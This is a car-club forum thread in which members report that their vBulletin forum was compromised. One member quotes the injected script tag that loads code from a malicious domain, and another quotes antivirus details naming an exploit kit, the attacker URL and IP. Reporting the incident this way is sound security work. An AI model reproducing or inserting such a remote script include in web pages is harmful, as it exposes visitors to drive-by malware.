Seems its been a problem on quite a few VB forums:
https://www.vbulletin.com/forum/show...e-Getting-This
Hi all,
Sorry about the caps, but this might be quite important.
Avast just sprung up a warning when i opened this forum.
It blocked a site URL of "http://kokosina.in/1".
Looking at the forum page HTML source, its being inserted as:
Its at the top of the forum footer code just before the google adwords code.Code:<script type="text/javascript" src="http://kokosina.in/1"></script>
I hope the forums havent been hacked and this has been inserted by someone...
I look through this forum about 10 times a day, and this blocked site warning only sprung up for the first time a few mins ago.
Daily: Toyota '05 Rav4 Sport
Projects: Celica GT4 ST185 (5S-GTE), Celica RA28 Celica (1UZ-FE)
Previous: Corona RT104, Starlet GT Turbo
Classic Celica Club of South Australia
Seems its been a problem on quite a few VB forums:
https://www.vbulletin.com/forum/show...e-Getting-This
Daily: Toyota '05 Rav4 Sport
Projects: Celica GT4 ST185 (5S-GTE), Celica RA28 Celica (1UZ-FE)
Previous: Corona RT104, Starlet GT Turbo
Classic Celica Club of South Australia
I just had the same happen to me just now
2jza70 Conversion finished, 456rwhp : 340rwkw @ 20psi
It seems its a code injection done by using a vulnerability in older versions of VBB.
Apparently forum users that do not have AV that blocks the site may be susceptible to a virus that the Kokosina site tries to install.
Forum mods need to fix this ASAP!!
You guys should disable the forum until this is fixed
Daily: Toyota '05 Rav4 Sport
Projects: Celica GT4 ST185 (5S-GTE), Celica RA28 Celica (1UZ-FE)
Previous: Corona RT104, Starlet GT Turbo
Classic Celica Club of South Australia
same my avg just blocked something similar as i brought the site up
RT104 with 4AGTE
Some assembly required
my AVG hasnt detected anything. nfi about this kinda stuff. i dont think i have the ability to shut the forums down anyway. you guys will have to wait till rod or dav etc are online
I'm getting the same warning - I was just coming here to post it myself.
I'm getting more details from Norton though:
Risk Name: Web attack: Exploit Kit variant 11
Attacking computer: kokosina.in (46.37.184.227,80)
Attacker URL: kokosina.in/t/go/php?sid=5
Source Address: 46.37.184.227
Traffic description: TCP, www-http
Feeling down? See: Beyondblue or for youth see: Headspace or call Lifeline on 13 11 14
Finally, a members ride thread. I present project One Thing Lead to Another (nominations for a better name are now open)
Hi Guys,
Thanks for the heads up on this.
Vito emailed the board after seeing this thread and thankfully it has all been sorted. There is indeed a large number of VB sites getting hacked at the moment and VB have released a security update as a result. The forums have been updated today by Sam and we are now on the newest most secure version of the software.
This is why the site was down briefly today and also why things are not all exactly where they "should be"
1971 2T-B Celica TA22 ST.
1973 2T-G Celica TA22, aka "The Unicorn".
1975 2T-G Celica TA27 GT
1976 2T-G Celica TA23, aka "The Colonel".
1985 3F Auto FJ62 Landcruiser
1989 7M-GTE MA70 Supra, aka "The Poopra"
History: Rods Classic Celica Sampler thread.
Thanks to Vito, the board and Sam for getting onto this in such a hurry
Feeling down? See: Beyondblue or for youth see: Headspace or call Lifeline on 13 11 14
Finally, a members ride thread. I present project One Thing Lead to Another (nominations for a better name are now open)
What actually would that trojan/virus thing do? Is it just like adware/malware stuff, or something a little more sinister?
Does anyone know what the payload of the attack was?
I visited the forum during the affected time and am concerned.
Also, IIRC I received the same warning from the toymods root. Has the whole hosting account been cleaned?
We should have a report on what happened...
came here to post this.. when i go on google and search for a topic on the toymods forum. i get a malicious popup window. has been doing this for close to a month. the way around was to copy the toymods link into address bar. but today i get this "attack site" warning.. like just now. so maybe not sorted completely yet? or was it a delayed message?
-Mark
E2 + E7 fan
'71 KE26 5k, '75 KE25 SR 4agte, '78 KP60 bug 4k-u, '83 KE70 SR Coupe 3tgte, '84 KE74, '84 YN57, '84 AE85.6, '86 AE82 FXGT 20v, '91 ST185, '92 SW20
I'm also getting the attack site warning from FireFox.
I got the same warning a few minutes ago, Chrome browser (v18.0.1025.165 on a 10.5.2 hackintosh) popped up a warning saying the domain was serving up malware.
Bookmarks